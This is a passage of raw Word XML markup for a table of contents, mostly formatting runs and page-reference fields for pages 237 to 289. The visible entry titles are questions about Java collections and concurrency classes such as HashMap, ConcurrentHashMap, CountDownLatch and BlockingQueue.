                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>237</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F1A24B9" w14:textId="40CE8D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7867370 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>238</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18FF96F0" w14:textId="68C9C57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7867371 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>240</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="204E44D7" w14:textId="6757A60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7867372 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>241</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75B3A2CD" w14:textId="285F7BD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7867373 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>242</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0779833E" w14:textId="4632879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7867374 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>244</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BACA33C" w14:textId="4D2AA26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7867375 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>244</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08FF1A1B" w14:textId="0B819D2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7867376 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>246</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D99211A" w14:textId="21FFEB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7867377 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>247</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3697AB20" w14:textId="1476B08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7867378 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>248</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="738CCBCE" w14:textId="3C17C4B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HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867379 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>249</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B738E3A" w14:textId="710CD64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7867380 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>252</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B243298" w14:textId="70AAD7F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7867381 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>253</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56B5BDDF" w14:textId="4019FBE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7867382 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>254</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1541E6E3" w14:textId="4BB6757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7867383 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C4341E6" w14:textId="6561860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7867384 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>257</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B43C734" w14:textId="1C88752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7867385 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>257</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="523E0E00" w14:textId="2131515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7867386 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>258</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31ABF65C" w14:textId="0AC0E39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7867387 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>259</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D16F187" w14:textId="16AB1BA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7867388 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>259</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="643C942B" w14:textId="524BC8E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7867389 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>260</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="030D2472" w14:textId="5BF5D47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7867390 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>261</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A3BCF54" w14:textId="09F1B05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7867391 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>262</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="538D9FE9" w14:textId="44FF3F0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7867392 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>263</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B3C88AE" w14:textId="06DB236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ashTable?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867393 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>265</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C546FA6" w14:textId="4462219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ynchronizedHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867394 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>267</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E4C17A3" w14:textId="1261099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ncurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867395 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>269</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38338402" w14:textId="60807A0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7867396 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>271</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B5C189E" w14:textId="0449095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7867397 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>273</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="072941B7" w14:textId="43CB447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untDownLatch?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867398 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>275</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54CAB490" w14:textId="67D65B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3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yclicBarrier?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867399 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>277</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F7DE328" w14:textId="30B9E99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pyOnWriteArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867400 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>280</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B80767C" w14:textId="6F7D92F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BlockingQueue?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867401 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>283</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A4E3DC1" w14:textId="106F723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Map and SynchronizedHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867402 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>285</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16A3CC43" w14:textId="3B60B38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Table and SynchronizedHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867403 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>287</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24DFF431" w14:textId="43E9D1D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Table and ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867404 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>289</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
